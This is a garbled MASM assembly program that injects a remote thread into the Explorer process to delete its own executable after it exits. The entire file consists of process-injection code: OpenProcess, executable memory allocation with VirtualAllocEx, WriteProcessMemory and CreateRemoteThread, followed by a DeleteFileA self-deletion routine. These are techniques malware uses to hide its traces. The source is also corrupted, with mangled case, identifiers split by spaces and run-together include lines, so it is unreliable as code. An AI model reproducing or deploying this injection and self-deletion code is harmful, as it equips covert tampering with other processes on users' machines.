*********************************************************** ******; ml / c / coff / fo selfkill-rnt.obj selfkill-rnt.asm; link / subsystem: windows /section: horns ,wre selfkill-rnt.obj; ******* ************************************************************************************************** .MODEL FLAT, STDCALL OPTION CASEMAP: NONE
Include Windows.Include User32.incinCludelib user32.libinclude kernel32.includeLod kernel32.lib
*********************************************************** ****** .code; Delete itself remote thread code KREMOTE_CODE_START EQU this BYTE CALL @f @@: pop ebx sub ebx, offset @B; repositioning
Push 500 Call [EBX _LPselfkillsleep] Lea Eax, [EBX Offset _SelfkillSelfname] Push Eax Call [EBX _LPSELFKILDELETEFILE] RET
_lpselfkillsleep dd? _lpselfkillDeletefile DD? _SelfkillSelfname:
KREMOTE_CODE_END equ this byteKREMOTE_CODE_LENGTH equ offset KREMOTE_CODE_END - offset KREMOTE_CODE_START; *************************************** *****************
.DATA?
REMOTE_CODE DB KREMOTE_CODE_LENGTH DUP (?) SZSELFNAME DB MAX_PATH DUP (?)
.code
*********************************************************** ******; Used to insert Remote Thread Szdesktopclass DB 'Progman', 0SZDeskTopWindow DB 'Program Manager', 0
_Remotecode2kxp proc @_rmcodeestart, @ _ rmcodelen local @hrmcodememory local @HselfkillProcessid local @HselfkillProcess
; Find File Manager window and get the process ID, and then open the process invoke FindWindow, addr szDesktopClass, addr szDesktopWindow lea ecx, @ hselfkillProcessID invoke GetWindowThreadProcessId, eax, ecx invoke OpenProcess, PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or / PROCESS_VM_WRITE, FALSE, @ hselfkillProcessID mov @hselfkillProcess , eax; in the process of allocating space and write remote code, to establish a remote thread invoke VirtualAllocEx, @ hselfkillProcess, NULL, @ _ RmCodeLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE .if eax mov @ hRmCodeMemory, eax invoke WriteProcessMemory, @ hselfkillProcess, eax, @ _ RmCodeStart , @ _ RmCodeLen, NULL xor eax, eax invoke CreateRemoteThread, @ hselfkillProcess, eax, eax, @ hRmCodeMemory, eax, eax, eax invoke CloseHandle, eax .endif invoke CloseHandle, @ hselfkillProcess ret_RemoteCode2KXP endp; ********* ****************************************************** SZSELFKILLDKERNEL DB 'KERNEL32 .dll ', 0szselfkillsleep DB "Sleep", 0SZselfkillletefile DB "deletefilea", 0
start:; an API addresses (hard-coded address) invoke GetModuleHandle, addr szselfkillDllKernel mov esi, eax invoke GetProcAddress, esi, offset szselfkillSleep mov _lpselfkillSleep, eax invoke GetProcAddress, esi, offset szselfkillDeleteFile mov _lpselfkillDeleteFile, eax; the remote code and its own address merged CLD MOV ECX, KREMOTE_CODE_LENGTH MOV ESI, OFFSET KREMOTE_CODE_START MOV EDI, OFFSET Remote_code rep Movsb Invoke getModuleFileName, Null, Offset Szselfname, Max_Path
Push Kremote_code_length max_path push offset remote_code call _remotecode2kxp Ret
End Start
